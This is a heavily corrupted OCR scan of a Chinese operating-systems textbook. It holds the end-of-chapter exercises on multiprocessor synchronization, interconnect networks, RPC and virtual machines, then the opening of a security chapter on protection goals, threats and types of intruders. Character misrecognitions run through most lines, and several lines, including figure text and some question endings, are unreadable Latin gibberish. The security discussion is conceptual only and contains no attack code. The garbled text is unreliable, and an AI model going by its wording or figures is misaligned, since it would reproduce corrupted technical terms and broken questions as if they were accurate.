力 至 数 百 个 核 的 曲面 机 也 为 期 不 远 了 。 利 用 这 些 计算 能 力 的 一 个 可 能 
的 方式 是 将 标准 的 棵 面 应 用 程序 并 行 化 ， 例 如 文字 处 理 或 者 Web 浏 览 
aw; 另 一 个 可 能 的 方式 是 将 操作 系统 提供 的 服务 (例如 TCP 操 作 ) 和 
常用 的 库 服 务 《例如 安全 http 库 函数 ) 并 行 化 。 你 认为 哪 一 种 方式 更 
有 前 途 ? 为 什么 ? 


8. 为 了 避免 范 争 ， 在 SMP 操 作 系统 代码 段 中 的 临界 区 真 的 有 必要 
吗 ， 或 者 数据 结构 中 的 互 斥 信号 量 也 可 完成 这 项 工作 吗 ? 


9. 在 多 处 理 器 同步 中 使 用 TSL 指 令 时 ， 如 果 持 有 锁 的 CPU 和 请 求 锁 
的 CPU 都 需要 使 用 这 个 拥有 互 斥 信 号 量 的 高 速 缓冲 块 ， 那 么 这 个 拥有 
互 不 信号 量 的 高 速 绥 冲 块 就 得 在 上 述 两 个 CPU 之 间 来 回 穿梭 。 为 了 减 
少 总 线 交 通 的 繁忙 ， 每 隔 50 个 总 线 周期 ， 请 求 锁 的 CPU 就 执行 一 条 
TSL 指 令 ， 但 是 持 有 锁 的 CPU 在 两 条 TSL 指 令 之 间 需 要 频繁 地 引用 该 拥 
有 互 不 信号 量 的 高 速 缓冲 块 。 如 果 一 个 高 速 缓冲 块 中 有 16 个 32 位 字 ， 
每 一 个 字 都 需要 用 一 个 总 线 周 期 传送 ， 而 该 总 线 的 频率 是 400MHz， 
那么 高 速 缓冲 块 的 来 回 移动 会 占用 多 少 总 线 带 宽 ? 


10. 课 文中 曾经 建议 在 使 用 TSL 轮 询 锁 之 间 使 用 二 进 制 指数 补偿 算 
法 。 也 建议 过 在 轮 询 之 间 使 用 最 大 时 延 。 如 果 没 有 最 大 时 延 ， 该 算法 
会 正确 工作 吗 ? 


11. 假 设 在 一 个 多 人 处理 右 的 同步 处 理 中 没有 TSL 指 令 。 相 反 ， 提 供 
了 为 一 个 指令 SWP， 该 指令 可 以 把 一 个 寄存 器 的 内 容 交 换 到 内 存 的 一 
个 字 中 。 这 个 指令 可 以 用 于 多 处 理 器 的 同步 吗 ? 如 果 可 以 ， 它 应 该 起 
样 使 用 ? 如 有 果 不 行 ， 为 什么 它 不 行 ? 


12. 在 本 问题 中 ， 读 者 要 计算 把 一 个 目 旋 锁 放 到 总 线 上 需要 花费 总 
线 的 多 少 靶 载 时 间 。 假 设 CPU 执 行 每 条 指令 化 费 5 纳 秒 。 在 一 条 指令 执 
行 完 毕 之 后 ， 不 需要 任何 总 线 周期 ， 例如， 执行 TSL 指 令 。 每 个 总 线 
周期 比 指令 执行 时 间 长 10 纳 秒 甚 至 更 多 。 如 果 一 个 进程 使 用 TSL 循 环 
试图 进入 某 个 临界 区 ， 它 要 耗费 多 少 的 总 线 市 宽 ? 假设 通 稍 的 高 速 组 
冲 处 理 正在 工作 ， 所 以 取 一 条 循环 体 中 的 指令 并 不 会 浪费 忆 线 周期 。 


13. 图 8-12 用 于 描绘 分 时 环境 ， 为 什么 在 b 部 分 中 只 出 现 了 进程 A? 


14. 茶 和 调度 减少 了 高 速 绥 促 的 失效 。 它 也 减少 TLB 的 失效 吗 ? 对 
FERE? 


15. 对 于 图 8-16 中 的 每 个 拓扑 结构 ， 互 连 网 络 的 直径 是 多 少 ? 请 计 
算 该 问题 的 所 有 跳 数 (主机 -路 由 器 和 路 由 器 -路 由 器 ) 。 


16.4 2 Al8-16 d 中 的 双 串 面 拓扑 ， 但 十 扩展 到 kxk。 该 网 络 的 直径 


EZD? 提示 : 分 别 考 虑 k 是 奇数 和 偶数 的 情况 。 


17. 互 联网 络 的 平分 贷款 经 常用 来 测试 网 络 容 量 。 其 计算 方法 十， 
通过 移 走 最 小 数量 的 链接 ， 将 网 络 分 成 两 个 相等 的 部 分 。 然 后 把 被 移 
走 链接 的 容量 加 入 进去 。 如 末 有 很 多 方法 进行 分 割 ， 那 么 最 小 带宽 谍 
平分 市 宽 。 对 于 有 一 个 8x8x8 立 方 体 的 互连网 络 ， 如 采 每 个 链接 


其 
带宽 是 1Gbps， 那 么 其 平分 市 宽 是 多 少 ? 


18. 如 条 多 计算 机 系统 中 的 网 络 接口 处 于 用 户 模 式 ， 那 么 从 源 RAM 
到 目的 RAM 只 需要 三 个 副本 。 假 设 该 网 络 接口 卡 接收 或 发 送 一 个 32 位 
的 字 需 要 20ns， 并 且 该 网 络 接 口 卡 的 频率 是 1Gbps。 如果 忽略 挥 复制 的 
时 间 ， 那 么 把 一 个 64 字 市 的 包 从 源 送 到 目的 地 的 延 时 是 多 少 ? WR 
虑 复制 的 时 间 呢 ? 接 看 考虑 需要 有 两 次 额外 复制 的 情形 ， 即 在 发 送 方 
将 数据 复制 到 内 核 的 时 间 ， 和 在 接收 方 将 数据 从 内 核 中 取出 的 时 间 。 
在 这 种 情形 下 的 延 时 是 多 少 ? 


19. 对 于 三 次 复制 和 五 次 复制 的 情形 ， 重 复 前 一 个 问题 ， 不 过 这 次 
是 计算 带宽 而 不 是 计算 延 时 。 


20. 在 共 胖 存储 喜多 处 理 套 和 多 计算 机 之 间 send 和 receive 的 实现 要 


Ae > eH), AERAN PERE A MR? 


21. 在 将 数据 从 RAM 传 送 到 网 络 接口 时 ， 可 以 使 用 钉 住 页 面 的 方 
法 ,假设 钉 住 和 释放 页 面 的 系统 调用 要 花费 1 微 秒 时 间 。 使 用 DMA 方 
法 复制 速度 是 5 字 节 / 纳 秒 ， 而 使 用 编程 TO 方法 需要 20 纳 秒 。 一 个 数据 
包 应 该 有 多 大 才 值 得 钉 住 页 面 并 使 用 DMA 方 法 ? 


22. 将 一 个 过 程 从 一 台 机 器 中 取出 并 且 放 到 男 一 台 机 器 上 称 为 
RPC， 但 会 出 现 一 些 问 题 。 在 正文 中 ， 我 们 指出 了 其 中 四 个 : 指针、 
未 知 数组 大 小 、 未 知 参数 类 型 以 及 全 局 变量 。 有 一 个 未 讨论 的 问题 
是 ， 如 果 GORE) 过 程 执行 一 个 系统 调用 会 怎样 。 这 样 做 会 引起 什么 
问题 ， 应 该 怎样 处 理 ? 


23. 在 DSM 系 统 中 ， 当 出 现 一 个 页 面 故障 时 ， 必 须 对 所 需要 的 页 面 
进行 定位 。 请 列 出 两 种 寻找 该 页 面 的 可 能 途径 。 


24. 考 处 图 8-24 中 的 处 理 絮 分 配 。 假 设 进 程 H 从 太后 2 被 移 到 市 点 3 


an) 
上 。 此 时 的 外 部 信息 流量 是 多 少 ? 


25. 某 些 多 计算 机 人 允许 把 运行 着 的 进程 从 一 个 市 点 迁移 到 为 一 个 市 
上 护 。 集 止 一 个 进程 ， 冻 结 其 内 存 上 映像， 然后 束 把 他 们 转移 到 男 一 个 市 
REEERE? 请 指出 要 使 所 述 的 方法 能 够 工作 的 两 个 必须 解决 的 问 


题 。 


26. 考 虑 能 同时 支持 最 多 n 个 虚拟 机 的 I 型 管理 程序 ，PC 机 最 多 可 以 
有 4 个 主 磁 副 分 区 。 请 问 n 可 以 比 4 大 吗 ? 如 宁可 以 ， 数 据 可 以 存在 哪 


H? 


27. 处 理 客户 操作 系统 使 用 普通 (非特 权 ) 指令 改变 页 表 的 一 个 方 
式 是 将 页 表 标 记 为 只 读 ， 所 以 当 它 被 修改 的 时 候 系统 陷入 。 还 有 什么 
方式 可 以 维护 页 表 副 本 (shadow page table) ? 比较 你 的 方法 与 只 读 页 
表 方 式 在 效率 上 的 差别 。 


28.VMware 每 次 对 一 个 基本 块 进行 二 进 制 转换 ， 然 后 执行 这 个 基 
本 块 并 开始 转换 下 一 个 基本 块 。 它 能 事先 转换 整个 程序 然后 执行 吗 ? 
如 采 能 ， 每 种 技术 的 优点 和 缺点 分 别 是 什么 ? 


29. 如 采 一 个 操作 系统 的 源 代码 可 以 得 到 ， 对 半 虚 拟 化 一 个 操作 系 
统 有 意义 吗 ? 如 采 源 代码 不 能 得 到 呢 ? 


30. 各 种 PC 在 底层 会 有 微小 的 兰 别 ， 例 如 如 何 管理 时 钟 、 如 何 处 理 
中 断 以 及 DMA 方 面 的 一 些 细节 。 那 么 这 些 差 别 是 否 意味 着 虚拟 机 在 实 
际 中 不 能 够 很 好 地 工作 ? 请 解释 你 的 答案 。 


31. 在 以 太 网 上 为 什么 会 有 对 电 统 长 度 的 限制 ? 


32. 在 一 台 PC 上 运行 多 个 虚拟 机 需要 大 量 的 内 存 ， 为 什么 ? 你 能 想 
出 什么 方式 降低 内 存 的 使 用 量 ? 请 解释 理由 。 


33. 在 图 8-30 中 ， 四 台 机 器 上 的 第 三 层 和 第 四 层 标 记 为 中 间 件 和 应 
用 。 在 何 种 角度 上 它们 是 跨 平台 一 致 的 ， 而 在 何 种 角度 上 它们 是 跨 平 


台 有 差异 的 ? 


34. 在 图 8-33 中 列 出 了 六 种 不 同 的 服务 。 对 于 下 面 的 应 用 ， 哪 一 种 
更 适用 ? 


a)Internet 上 的 视频 点 播 。 
b) 下 载 一 个 网 页 。 


35.DNS 的 名 称 有 一 个 层次 结构 ， 如 cs.uni.edu 或 sales.general- 
widget.com。 维 护 DNS 数 据 库 的 一 种 途径 是 使 用 一 个 集中 式 的 数据 
库 ， 但 是 实际 上 并 没有 这 样 做 ， 其 原因 是 每 秒 钟 会 有 太 多 的 请 求 。 请 
提出 一 个 实用 的 维护 DNS 数据 库 的 建议 。 


36. 在 讨论 浏览 右 如 何 处 理 URL 时 ， 曾 经 说 明 与 端口 80 连 接 。 为 什 
LZ’ 


37 ENUE H BEAD, (et Ae AMER © E 
虚拟 机 迁移 的 过 程 中 会 产生 哪些 问题 ? 


38. 在 显示 网 页 中 使 用 的 URL 可 以 透明 吗 ? 请 解释 理由 。 


39. 当 浏览 絮 获 取 一 个 网 页 时 ， 它 首先 发 起 一 个 TCP 链 接 以 获得 页 
面 上 的 文本 (该 文本 用 HTML 语 言 写成 ) 。 然 后 关闭 链接 并 分 析 该 页 


面 。 如 果 页 面 上 有 图 形 或 图 标 ， 就 发 起 不 同 的 TCP 链 接 以 获取 它们 。 
请 给 出 两 个 可 以 改善 性 能 的 替代 建议 。 


40. 在 使 用 会 话语 义 时 ， 有 一 项 总 是 成 立 的 ， 即 一 个 文件 的 修改 对 
于 进行 该 修改 的 进程 而 言 是 立即 可 见 的 ， 而 对 其 他 机 融 上 的 进程 而 言 
征 绝对 不 可 见 的 。 不 过 存在 一 个 问题 ， 即 这 种 修改 对 同一 台 机 需 上 的 
其 他 进程 是 否 应 该 立即 可 见 。 请 提出 正 反 双方 的 争辩 意见 。 


41. 当 有 多 个 进程 需要 访问 数据 时 ， 基 于 对 象 的 访问 在 哪些 方面 要 
好 于 共 至 存储 器 


42. 在 Linda 的 in 操 作 完 成 对 一 个 元 组 的 定位 之 后 ， 线 性 地 查询 整个 
元 组 空间 是 非常 低 效 率 的 。 请 设计 一 个 组 织 元 组 空间 的 方式 ， 可 以 在 
所 有 的 im 操 作 中 加 快 查询 操作 。 


43. 绥 存 区 的 复制 很 花费 时 间 。 写 一 个 C 程 序 找 出 你 访问 的 系统 
这 种 复制 花费 了 多 少时 间 。 可 使 用 clock 或 times 函 数 用 以 确定 在 复制 一 
个 大 数组 时 所 花费 的 时 间 。 请 测试 不 同 大 小 的 数组 ， 以 便 把 复制 时 间 
和 系统 开销 时 间 分 


44. 编 写 可 作为 客户 机 和 服务 占 代 码 片 段 的 C 范 数 ， 使 用 RPC 来 调 
用 标准 printf 函 数 ， 并 编写 一 个 主 程序 来 测试 这 些 函 数 。 客 户 机 和 服务 


右 通 过 一 个 可 在 网 络 上 传输 的 数据 结构 实现 通信 。 读 者 可 以 对 客户 机 


所 能 接收 的 格式 化 字符 串 长 度 以 及 数字 、 类 型 和 变量 的 大 小 等 方面 设 
EBRA ° 


45. 写 两 个 程序 用 以 模拟 一 台 多 计算 机 上 的 负载 平衡 。 第 一 个 程序 
应 该 按照 一 个 初始 化 文件 把 m 个 进程 分 布 到 n 个 机 器 上 。 每 个 进程 应 该 
有 一 个 通过 Gaussian 分 布 随机 挑选 的 运行 时 间 ， 即 该 分 布 的 平均 值 和 
标准 偏差 是 模拟 的 参数 。 在 每 次 运行 的 结尾 ， 进 程 创建 一 些 新 的 进 
程 ， 按 照 Poisson 分 布 选择 这 些 独 进程 。 当 一 个 进程 退出 时 ，CPU 必 须 
确定 是 放弃 进程 或 是 寻找 新 的 进程 。 如 采 在 机 右上 有 总 数 超过 k 个 进程 
的 话 ， 第 一 个 程序 应 该 使 用 发 送 者 驱动 算法 放弃 工作 。 第 二 个 程序 在 
必要 时 应 该 使 用 接收 者 驱动 算法 获得 工作 。 请 给 出 所 需要 的 合理 假 
设 , 但 要 写 出 清楚 的 说 明 。 


46. 写 一 个 程序 ， 实 现 8.2 厄 中 描述 的 发 送 方 驱动 和 接收 方 驱动 的 负 
载 平衡 算法 。 这 个 算法 必须 把 新 创建 的 作业 列表 作为 输入 ， 作 业 的 描 
述 为 (creating_processor，start_time，required_CPU _time) ， 其 中 
creating_processor 表 示 创 建 作业 的 CPU 序 号 ，start_time 表 示 创 建 作业 的 
时 间 ，required_CPU_time 表 示 完 成 作业 所 需要 的 时 间 (以 秒 为 单 
位 ) 。 当 节点 在 执行 一 个 作业 的 同时 有 第 二 个 作业 被 创建 ， 则 认为 该 
节点 超 负 荷 。 在 重负 载 和 轻 负 载 的 情况 下 分 别 打印 算法 发 出 的 探测 消 
筷 的 数目 。 同 时 ， 也 要 打印 任意 主机 发 送 和 接收 的 最 大 和 最 小 的 探 针 
数 。 为 了 模拟 负载 ， 要 写 两 个 负载 产生 器 。 第 一 个 产生 器 模拟 重 的 负 


载 ， 产 生 的 负载 为 平均 每 隔 AJL 秒 N 个 作业 ， 其 中 AJL 是 作业 的 平均 长 
度 ，N 有 是 处 理 需 个 数 。 作 业 长 度 可 能 有 长 有 短 ， 但 是 平 均 作 业 长 度 必 
须 是 AJL。 作 业 必 须 随机 地 创建 (放置 ) 在 所 有 处 理 嚣 上。 第 二 个 产 
生 器 模拟 轻 的 负载 ， 每 AL 秒 随机 地 产生 (N/3) 个 作业 。 为 这 两 个 负 
载 产 生 絮 调节 其 他 的 参数 设置 ， 看 看 是 如 何 影 响 探测 消 恩 的 数目 。 


47. 实 现 发 布 /订阅 系统 的 最 简单 的 方式 是 通过 一 个 集中 的 代理 ， 这 
个 代理 接收 发 布 的 文章 ， 然 后 向 合适 的 订阅 者 分 发 这 些 文章 。 写 一 个 
多 线程 的 应 用 程序 来 模拟 一 个 基于 代理 的 发 布 /订阅 系统 。 发 布 者 和 订 
阅 者 线程 可 以 通过 (共享 ) 内 存 与 代理 进行 通信 。 每 个 消息 以 消息 长 
度 域 开 头 ， 后 面 某 跟着 其 他 字符 。 人 发 布 者 给 代理 发 布 的 消息 中 ， 第 一 
行 是 用 “.” 隔 开 的 层次 化 主题 ， 后 面 一 行 或 多 行 是 发 布 的 文章 正文 。 订 
阅 者 给 代理 发 布 的 消息 ， 只 包含 着 一 行 用 “.” 隔 开 的 层次 化 的 兴趣 行 
(interest line) ， 表 示 他 们 所 感 兴趣 的 文章 。 兴 趣 行 可 能 包含 “*.” 等 通 
配 符 ， 代 理 必须 返回 匹配 订阅 者 兴趣 的 所 有 (过 去 的 ) 文章 ， 消 息 中 
的 多 篇 文章 通过 “BEGIN NEW ARTICLE” 来 分 隔 。 订 阅 者 必须 打印 他 
接收 到 的 每 条 消息 “如 他 的 兴趣 行 ) 。 订 阅 者 必须 连续 接收 任何 匹配 
的 新 发 布 的 文章 。 发 布 者 和 订阅 者 线程 可 通过 终端 输入 “P? 或 “S” 的 方 
式 自 由 创建 〈 分 别 对 应 发 布 者 和 订阅 者 ) ， 后 面 紧 跟 的 是 层次 化 的 主 
题 或 兴趣 行 。 然 后 发 布 者 需要 输入 文章 ， 在 某 一 行 中 键入 “.” 表 示 文 章 
结束 。〈 这 个 作业 也 可 以 通过 基于 TCP 的 进程 间 通 信 来 实现 ) 。 


PIR ”安全 


许多 公司 持 有 一 些 有 价值 的 并 加 以 密切 保护 的 信息 。 这 些 信息 可 
以 是 技术 上 的 (如 新 球 芯 片 或 软件 的 设计 方案 ，、 商 业 上 的 (如 针对 
竞争 对 手 的 研究 报告 或 营销 计划 ) 、 财 务 方面 的 如 股票 分 红 预 
K) 、 法 律 上 的 (如 潜在 并 购 方 案 的 法 律 文本 ) 以 及 其 他 可 能 有 价值 
的 信息 。 公 司 通常 在 存放 这 些 信息 的 大 楼 入 口 处 安排 佩带 统一 徽章 的 
警卫 ， 由 他 们 来 检查 进入 大 楼 的 人 群 。 并 且 ， 办 公 室 和 文件 想 通 常会 
上 锁 以 确保 只 有 经 过 授权 的 人 才能 接触 到 这 类 信息 。 


家 用 计算 机 也 越 来 越 多 地 开始 保存 重要 的 数据 。 很 多 人 将 他 们 的 
纳税 申报 单 和 信用 卡号 码 等 财务 信息 保存 在 计算 机 上 “。 人 情书 也 越 来 越 
多 地 以 电子 信件 的 方式 出 现 。 目 前 计算 机 硬盘 已 经 装 满 了 重要 的 照 
片 、 视 频 以 及 电影 。 


随 铸 越 来 越 多 的 信息 存放 在 计算 机 系统 中 ， 确 保 这 些 信息 的 安全 
束 变 得 越 来 越 重要 。 对 所 有 的 操作 系 统 而 言 ， 保 护 此 类 信息 不 被 未 经 
许可 地 第 用 是 主要 考虑 的 问题 。 然 而 ， 随 着 计算 机 系统 的 广泛 使 用 
(和 随 之 而 来 的 系统 缺陷 ) ， 保 证 信息 安全 也 变 得 越 来 越 难 。 在 下 面 
的 小 和 节 里 ， 我 们 将 讨论 有 关 安 全 与 防护 的 春 干 话题 ， 其 中 一 些 内 容 与 
我 们 保护 现实 生活 中 的 纸 质 文件 比较 相似 ， 而 男 一 些 则 是 计算 机 系统 


所 独 有 的 。 在 这 一 章 里 ， 我 们 将 考察 安装 了 操作 系统 之 后 的 计算 机 安 


全 特性 。 


有 天 操作 系统 安全 的 话题 在 过 去 的 二 十 年 里 产生 了 很 大 的 变化 。 
在 20 世 纪 90 年 代 早 期 之 前 ， 少 数 家 庭 才 拥有 计算 机 ， 几 乎 所 有 的 计算 
都 是 在 公司 、 大 学 和 其 他 一 些 拥 有 多 用 户 计算 机 (从 大 型 机 到 微型 计 
算 机 ) 的 组 织 中 完成 的 。 这 些 机 器 几乎 都 是 相互 隔离 的 ， 没 有 任何 一 
台 被 连接 到 网 络 中 。 在 这 样 的 环境 下 ， 保 证 安全 性 所 要 做 的 全 部 工作 
下 集中 在 了 如 何 保 证 每 个 用 户 只 能 看 到 目 己 的 文件 。 如 采 Tracy 和 
Marcia 是 同一 合计 算 机 的 两 个 注册 用 户 ， 那 么 “安全 性 ? 融 是 保证 他 们 ] 
谁 都 不 能 读 取 或 修改 对 方 的 文件 ， 除 非 这 个 文件 被 设 为 共 至 权限 。 复 
杂 的 模型 和 机 制 被 开发 出 来 ， 以 保证 没有 哪个 用 户 可 以 获取 非法 权 
BR ° 


有 时 这 种 安全 模型 和 机 制 涉及 一 类 用 户 ， 而 非 单 个 用 户 。 例 如 ， 
在 一 台 军 用 计算 机 中 ， 任 何 数 据 都 必须 被 标记 为 “绝密 ”、“ 机 密 ”、“ 秘 
密 ” 或 “公开 ”， 而 且 下 士 不 能 允许 查看 将 军 的 目录 ， 不论 这 个 下 士 是 
谁 ， 无 论 他 想 要 查看 的 将 军 是 谁 ， 这 种 越权 访问 都 必须 被 禁止 。 在 过 
去 的 儿 十 年 中 ， 这 样 的 问题 被 反复 地 人 研究、 报道 和 解决 。 


当时 一 个 谱 在 的 假设 是 ， 一 旦 选 定 了 一 个 模型 并 据 此 实现 了 安 
系统 ， 那 么 实现 该 系统 的 软件 也 是 正确 的 ， 会 完全 执行 选 定 的 安全 党 
略 。 通 常情 况 下 ， 模 型 和 软件 都 非 第 人 简单， 因此 该 假设 常 第 是 成 并 


的 。 即 如 有 果 Tracy 理 论 上 不 被 允许 查看 Marcia 的 某 个 文件 ， 那 么 她 的 确 
无 法 查看 。 


随 厦 个 人 计算 机 和 互联 网 的 普及 ， 以 及 公用 大 型 机 和 人 小 型 机 的 消 
失 ， 情 况 发 生 了 变化 \ 尽 管 不 是 翻天 覆 地 的 变化 ， 在 局 域 网 的 公共 服 
务 器 与 公用 小 型 计算 机 很 相似 ) 。 至 少 对 于 家 庭 用 户 来 说 ， 他 们 受到 
非法 用 户 入 侵 并 被 鳃 取信 息 的 威胁 变 得 不 存在 了 ， 因 为 别人 不 能 使 用 
他 们 的 计算 机 。 


不 笠 的 是 ， 就 在 这 些 威胁 消失 的 同时 ， 另 一 种 威胁 悄然 而 至 ( 威 
胁 守 恒 的 法 则 ? ) : 来 自 外 部 的 攻击 。 病 毒 (Virus) > tHE 
(Worm) 和 其 他 恶意 代码 通过 互联 网 开始 在 计算 机 中 蔓延 ， 并 肆 无 忌 
悼 地 进行 破坏 。 它 们 的 帮凶 是 软件 漏洞 的 爆炸 性 增长 ， 这 些 大 型 软件 
已 经 开始 取代 以 前 好 用 的 小 软件 。 当 下 的 操作 系统 包括 五 百 万 行 以 上 
的 内 核 代码 和 100MB 级 的 应 用 程序 来 规定 系统 的 应 用 准则 ， 使 得 系统 
中 存在 大 量 可 以 被 恶意 代码 利用 的 漏 词 。 因 此 我 们 现在 从 形式 上 证 明 
是 安 全 的 系统 却 可 能 很 容易 被 侵入 ， 因 为 代码 中 的 漏洞 可 能 允许 恶意 
软件 做 一 些 原则 上 被 禁止 的 事情 。 


基于 以 上 问题 ， 本 章 将 分 为 两 部 分 进行 讨论 。9.1 广 从 一 些 细 市 上 
分 析 系 统 威 腑 ， 看 看 哪些 是 我 们 想 要 保护 的 。9.2 市 介绍 了 安全 领域 中 
基本 但 却 重要 的 工具 : 现代 密码 学 。9.3 市 介绍 了 关于 安全 的 形式 化 模 


型 ， 并 论述 如 何在 用 户 之 间 进 行 安全 的 访问 和 保护 ， 这 些 用 户 既 有 保 
密 的 数据 ， 也 有 与 其 他 用 户 共 至 的 数据 。 


接 下 来 的 五 节 将 讨论 实际 存在 的 安全 问题 ， 对 实际 的 恶意 代码 防 


护 和 计算 机 安全 研究 前 沿 进行 讨论 ， 最 后 是 一 个 简短 的 总 结 。 


值得 注意 的 是 ， 尽 管 本 书 是 天 于 操作 系统 的 ， 然 而 操作 系统 安全 
与 网 络 安全 之 间 却 有 着 不 可 分 离 的 联系 ， 无 法 将 它们 分 开 讨 论 。 例 
如 ， 病 毒 通过 网 络 侵 入 到 计算 机 中 ， 破 坏 操 作 系统 。 总 而 言 之 ， 我 们 
趋 于 做 足 工 作 ， 即 包含 很 多 与 主题 紧密 相关 却 并 不 属于 操作 系统 研究 
领域 的 内 容 。 
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我 们 从 几 个 术语 的 定义 来 开始 本 章 的 学 习 。 有 些 人 不 加 区 分 地 使 
用 “安全 ” (security) 和 “防护 ” (protection) 两 个 术语 。 然 而 ， 当 我 们 
讨论 基本 问题 时 有 必要 去 区 分 “安全 ”与 “防护 ”的 含义 。 这 些 基本 问题 
包括 确保 文件 不 被 未 经 授权 的 人 读 取 或 千 改 。 这 些 问题 一 方面 包括 涉 
及 技术 、 管 理 、 法 律 和 政治 方面 的 问题 ， 另 一 方面 也 包括 使 用 特定 的 
操作 系统 机 制 来 提供 安全 保障 的 问题 。 为 了 避免 混 清 ， 我 们 用 术语 “ 安 
全 ”来 表示 所 有 的 基本 问题 ， 用 术语 “防护 机 制 * 来 表示 用 特定 的 操作 系 
统 机 制 确 保 计 算 机 信息 安全 。 但 是 两 个 术语 之 间 的 界限 没有 定义 。 接 


下 来 我 们 看 一 看 安全 问题 的 特点 是 什么 ， 稍 后 我 们 将 研究 防护 机 制 和 
安全 模型 以 帮助 获取 安全 屏障 。 


安全 包含 许多 方面 的 内 容 ， 其 中 比较 主要 的 三 个 方面 是 威胁 的 实 
质 、 入 侵 者 的 本 性 和 数据 的 意外 遗失 。 我 们 将 分 别 加 以 研究 。 


9.1.1 威胁 


从 安全 性 角度 来 讲 ， 计 算 机 系统 有 四 个 主要 目标 ， 同 时 也 面临 着 
三 个 主要 威胁 ， 如 图 9-1 所 示 。 第 一 个 目标 是 数据 保密 (data 
confidentiality) ， 指 将 机 密 的 数据 置 于 保密 状态 。 更 确切 地 说 ， 如 采 
数据 所 有 者 决定 这 些 数 据 仅 用 于 特定 的 人 而 不 是 其 他 人 ， 那么 系统 可 
应 该 保证 数据 绝对 不 会 发 布 给 未 经 授权 的 人 。 数 据 所 有 者 至 少 应 该 有 
能 力 指 定 谁 可 以 阅读 哪些 信息 ， 而 系统 则 对 用 户 的 选择 进行 强制 执 
行 ， 这 种 执行 的 粒度 应 该 精确 到 文件 。 


目标 | 威胁 | 
EEE TARER 7 

| 数据 完整 性 数据 自 改 - 
E oci | EARS = 
| 排 eee O a cll 系统 被 病毒 控 制 


Al 9-1 安全 性 的 目标 和 威胁 


第 二 个 目标 数据 完整 性 (data integrity) 是 指 未 经 授权 的 用 户 没有 
得 到 许可 束 擅 目 改动 数据 。 这 里 所 说 的 改动 不 仅 是 指 改变 数据 的 值 ， 
而 且 还 包括 删除 数据 以 及 添加 错误 的 数据 等 情况 。 如 采 系 统 在 数据 所 
有 者 决定 改动 数据 之 前 不 能 保证 其 原封 未 动 ， 那 么 这 样 的 安全 系统 可 
ZIMEN A ° 


第 三 个 目标 系统 可 用 性 (system availability) 是 指 没有 人 可 以 扰乱 
系统 使 之 瘫痪 。 导 致 系统 拒绝 服务 的 攻击 十 分 普 壳 。 比如， 如 有 果 有 一 
台 计 算 机 作为 Internet 服 务 人 器， 那么 不 断 地 发 送 请 求 会 使 该 服务 闫 次 
痪 ， 因 为 单 是 检查 和 丢弃 进来 的 请 求 殉 吞 噬 抒 所 有 的 CPU 唤 源 。 在 这 
样 的 情况 下 ， 寿 系统 处 理 一 个 阅读 网 页 的 请 求 需要 100hs， 那 么 任何 人 
每 秒 发 送 10 000 个 这 样 的 请 求 忠 会 导致 系统 死机 。 许 多 合理 的 系统 模 
型 和 技术 能 够 保证 数据 的 机 密 性 和 完整 性 ， 但 是 避免 拒绝 服务 却 相当 
困难 。 


最 后 ， 近 年 来 操作 系统 出 现 了 新 的 威胁 ， 计 算 机 合法 用 户 以 外 的 
人 可 以 (通过 病毒 和 其 他 手段 获取 一 些 家 用 计算 机 的 控制 权 ， 并 将 
这 些 计算 机 变 成 盆 尸 (zombie) ， 入 侵 者 立即 成 为 这 些 计算 机 的 新 主 
人 。 通 种 情况 下 ， 这 些 僵尸 用 来 发 送 垃圾 邮件 ， 从 而 使 得 垃圾 邮件 的 
真正 来 源 难 以 追 踩 到 。 


从 某 种 意义 上 讲 ， 还 存在 着 另 一 种 威胁 ， 这 种 威胁 与 其 说 是 针对 
个 人 用 户 的 威胁 ， 不 如 说 是 对 社会 的 威胁 。 有 些 人 对 某 些 国家 或 种 族 
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事情 ， 然 而 并 不 在 意 “ 攻 击 ” 本 里。 


安全 问题 的 男 一 个 方面 是 隐私 (privacy) : 即 保证 私人 的 信息 不 
被 滥用 。 隐 私 会 导致 许多 法 律 和 道德 问题 。 政 府 是 否 应 该 为 每 个 人 编 
制 档案 来 追查 罪犯 ? 如 盗 留 犯 或 逃税 犯 。 警察 是 否 可 以 为 了 制止 有 组 
织 犯 罪 而 调查 任何 人 或 任何 事件 ? 当 这 些 特权 与 个 人 权益 发 生 冲 突 时 
ZEAE? 所 有 这 些 话 题 绝对 都 是 十 分 重要 的 ， 但 是 它们 却 超 出 了 本 
书 的 范围 。 


91.2 ARË 
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(可 能 为 了 自己 的 商业 利益 ) 。 从 安全 性 的 角度 来 说 ， 那 些 喜 欢 冯 入 
FACET RAM BAR (intruder) 或 敌人 
(adversary) 。 入 侵 者 表现 为 两 种 形式 : 被 动 入 侵 者 仅仅 想 阅 读 他 们 
无 权 阅 读 的 文件 ， 主 动 入 侵 痢 则 怀 有 恶意 ， 他 们 未 经 授权 融 想 改动 数 
据 。 当 我 们 设计 操作 系统 抵御 入 侵 者 时 ， 必 须 牢 记 要 抵御 哪 一 种 入 侵 
者 。 通 党 的 入 侵 者 种 类 包括 : 


1. 非 专业 用 户 的 随意 浏览。 许多 人 的 工作 台 上 都 有 个 人 计算 机 并 
连接 到 共有 至 文件 服务 器 上 。 人 类 的 本 性 促使 他 们 中 的 一 些 人 想 要 阅读 
他 人 的 电子 邮件 或 文件 ， 而 这 些 电 子 邮件 和 文件 往往 没有 设防 。 例 
如 ， 大 多 数 的 UNIX 系 统 在 默认 情况 下 新 建 的 文件 是 可 以 公开 访问 的 。 


2. 内 部 人 员 的 完 视 。 学 生 、 系 统 程序 员 、 操 作 员 或 其 他 技术 人 员 
经 常 把 进入 本 地 计算 机 系统 作为 个 人 挑战 之 一 。 他 们 通常 拥有 较 高 技 
能 ， 并 且 愿 意 人 花费 长 时 间 的 努力 。 


3. 为 获取 利益 而 尝试 。 有 些 银行 程序 员 试图 从 他 们 工作 的 银行 箔 
取 金 钱 。 他 们 使 用 的 手段 包括 改变 应 用 软件 使 得 利 妃 不 被 四 售 五 入 而 
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有 的 银行 记录 ”) ° 


4. 丙 业 或 军事 间谍 。 间 谍 指 那些 受到 竞争 对 手 或 外 国 的 货 助 并 且 
具有 很 明确 目的 的 人 ， 他 们 的 目的 在 于 守 取 计算 机 程序 、 交 易 数 据 、 
专利 、 技 术 、 芯 片 设计 方案 和 商业 计划 等 。 这 些 非法 企图 通常 使 用 窃 
听 手 段 ， 有 时 甚至 通过 搭建 天 线 来 收集 目标 计算 机 发 出 的 电磁 辐射 。 


我 们 必须 十 分 清楚 防止 政 对 国家 政府 鲫 取 军 事 秘 密 与 防止 学 生 在 
计算 机 系统 内 放 入 笑话 的 不 同 。 安 全 和 防护 上 所 做 的 努力 应 该 取决 于 
